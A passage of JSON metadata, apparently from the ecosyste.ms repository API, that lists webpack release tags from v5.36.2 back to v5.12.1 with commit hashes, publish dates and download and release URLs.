itHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5